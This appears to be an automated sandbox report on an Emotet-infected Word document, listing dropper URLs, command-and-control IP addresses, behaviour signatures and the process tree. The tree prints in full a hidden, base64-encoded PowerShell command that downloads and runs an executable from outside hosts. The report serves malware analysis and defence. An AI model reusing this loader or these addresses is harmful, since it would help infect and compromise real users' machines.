Analysis

  • max time kernel
    23s
  • resource
    win10v191014
  • submitted
    14-01-2020 23:24

General

  • Target

    02f1430398d91f4f11e295fa35ef1d8b68e85aec9e23174512cd1a6ed9d7f990

  • Sample

    200114-hwln13glwa

  • SHA256

    02f1430398d91f4f11e295fa35ef1d8b68e85aec9e23174512cd1a6ed9d7f990

Score
10/10

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

http://xmdivas.com/a9981b580e0fef550bcb0fd8fadcc02b/eiqgv/

exe.dropper

http://digitaltimbangan.com/cgi-bin/cj8/

exe.dropper

https://sports.tj/wp-includes/p5n5i1d/

exe.dropper

https://work4sales.com/wp-content/rw5N8k08Ed/

exe.dropper

https://rmntnk.ru/omlakdj17fkcjfsd/rxm1/

Extracted

Family

emotet

C2

66.7.242.50:8080

72.186.137.156:80

197.89.27.26:8080

91.250.96.22:8080

37.187.72.193:8080

104.131.44.150:8080

167.71.10.37:8080

78.24.219.147:8080

159.65.25.128:8080

95.128.43.213:8080

179.13.185.19:80

186.86.247.171:443

110.142.38.16:80

201.173.217.124:443

169.239.182.217:8080

211.63.71.72:8080

104.131.11.150:8080

190.55.181.54:443

209.146.22.34:443

64.53.242.181:8080

rsa_pubkey.plain

Signatures

  • Suspicious behavior: EmotetMutantsSpam 1 IoCs
  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of WriteProcessMemory 2 IoCs
  • Executes dropped EXE 2 IoCs
  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Process spawned unexpected child process 1 IoCs
  • Emotet

    Emotet is a trojan that is primarily spread through spam emails

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\02f1430398d91f4f11e295fa35ef1d8b68e85aec9e23174512cd1a6ed9d7f990.doc" /o ""
    1⤵
    • Checks processor information in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Enumerates system info in registry
    PID:4872
  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -w hidden -en JABOAHoAeQBsAHIAdwBiAG0AawB0AD0AJwBBAHAAbgBtAGQAdgB6AHQAJwA7ACQAWgBxAHAAdgB4AHgAaABvAGsAcgAgAD0AIAAnADMAOAAwACcAOwAkAFgAcgBzAHYAcgBuAGUAYwBoAGsAPQAnAEgAZwBkAHMAcgB6AG4AegBnAGwAJwA7ACQAVABuAHoAdgBiAHgAaABlAG8AawBuAGEAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAFoAcQBwAHYAeAB4AGgAbwBrAHIAKwAnAC4AZQB4AGUAJwA7ACQASQBqAHYAawBvAHMAcgB6AG8AcABhAHUAegA9ACcAWQBmAHEAeABxAGkAZgBmAGYAYQAnADsAJABHAHUAbAB4AGsAcgB5AGgAcQBmAGcAPQAuACgAJwBuAGUAJwArACcAdwAtAG8AYgAnACsAJwBqAGUAYwB0ACcAKQAgAE4ARQBUAC4AVwBlAEIAQwBMAGkARQBOAHQAOwAkAEkAbQBzAGYAcQBxAGgAZABnAGUAdgBiAG0APQAnAGgAdAB0AHAAOgAvAC8AeABtAGQAaQB2AGEAcwAuAGMAbwBtAC8AYQA5ADkAOAAxAGIANQA4ADAAZQAwAGYAZQBmADUANQAwAGIAYwBiADAAZgBkADgAZgBhAGQAYwBjADAAMgBiAC8AZQBpAHEAZwB2AC8AKgBoAHQAdABwADoALwAvAGQAaQBnAGkAdABhAGwAdABpAG0AYgBhAG4AZwBhAG4ALgBjAG8AbQAvAGMAZwBpAC0AYgBpAG4ALwBjAGoAOAAvACoAaAB0AHQAcABzADoALwAvAHMAcABvAHIAdABzAC4AdABqAC8AdwBwAC0AaQBuAGMAbAB1AGQAZQBzAC8AcAA1AG4ANQBpADEAZAAvACoAaAB0AHQAcABzADoALwAvAHcAbwByAGsANABzAGEAbABlAHMALgBjAG8AbQAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwByAHcANQBOADgAawAwADgARQBkAC8AKgBoAHQAdABwAHMAOgAvAC8AcgBtAG4AdABuAGsALgByAHUALwBvAG0AbABhAGsAZABqADEANwBmAGsAYwBqAGYAcwBkAC8AcgB4AG0AMQAvACcALgAiAFMAUABMAGAAaQB0ACIAKAAnACoAJwApADsAJABVAHcAegBkAG0AYgB3AG4AaAA9ACcATwBvAHMAcwB2AHMAZgBpAHQAcABwAG8AJwA7AGYAbwByAGUAYQBjAGgAKAAkAFMAZwBuAHUAagBqAGoAbgBnAG8AdAAgAGkAbgAgACQASQBtAHMAZgBxAHEAaABkAGcAZQB2AGIAbQApAHsAdAByAHkAewAkAEcAdQBsAHgAawByAHkAaABxAGYAZwAuACIAZABvAHcATgBgAGwAbwBhAEQAYABGAGkATABFACIAKAAkAFMAZwBuAHUAagBqAGoAbgBnAG8AdAAsACAAJABUAG4AegB2AGIAeABoAGUAbwBrAG4AYQApADsAJABOAHoAbgBjAGUAcABqAGwAawB4AGMAPQAnAE4AcwBkAG4AYwBnAGwAYwBpAHgAJwA7AEkAZgAgACgAKAAuACgAJwBHAGUAdAAtACcAKwAnAEkAdABlAG0AJwApACAAJABUAG4AegB2AGIAeABoAGUAbwBrAG4AYQApAC4AIgBsAGUAbgBgAEcAVABIACIAIAAtAGcAZQAgADMAMgA0ADUAMgApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBzAFQAYABBAFIAVAAiACgAJABUAG4AegB2AGIAeABoAGUAbwBrAG4AYQApADsAJABBAHMAagBzAGYAaQBnAG8AegBjAGkAPQAnAEMAagBjAGUAdgBwAGcAZwAnADsAYgByAGUAYQBrADsAJABRAGIAbgBpAGgAbgBlAGIAeAByAHEAPQAnAEIAcgByAHUAaQB5AG8AcQB1AGMAeQBkACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEUAYwBhAGQAaABpAGMAdABxAHMAegB5AGEAPQAnAEwAdABtAG4AcwBhAG0AZAAnAA==
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    • Process spawned unexpected child process
    PID:4356
    • C:\Users\Admin\380.exe
      "C:\Users\Admin\380.exe"
      2⤵
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      • Executes dropped EXE
      PID:4592
      • C:\Users\Admin\380.exe
        --4c4a2509
        3⤵
        • Suspicious behavior: EmotetMutantsSpam
        • Suspicious use of SetWindowsHookEx
        • Executes dropped EXE
        PID:4596

Network

MITRE ATT&CK Matrix ATT&CK v6

Discovery

Query Registry

2
T1012

System Information Discovery

2
T1082

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\380.exe
  • C:\Users\Admin\380.exe
  • C:\Users\Admin\380.exe
  • C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-634046074-2673730973-2644684987-1000\0f5007522459c86e95ffcc62f32308f1_293fa5bd-edfb-4bba-800e-a7dce3ea3438
  • memory/4592-7-0x0000000002270000-0x0000000002287000-memory.dmp
    Filesize

    92KB

  • memory/4596-10-0x0000000000610000-0x0000000000627000-memory.dmp
    Filesize

    92KB

  • memory/4596-11-0x0000000000400000-0x000000000046E000-memory.dmp
    Filesize

    440KB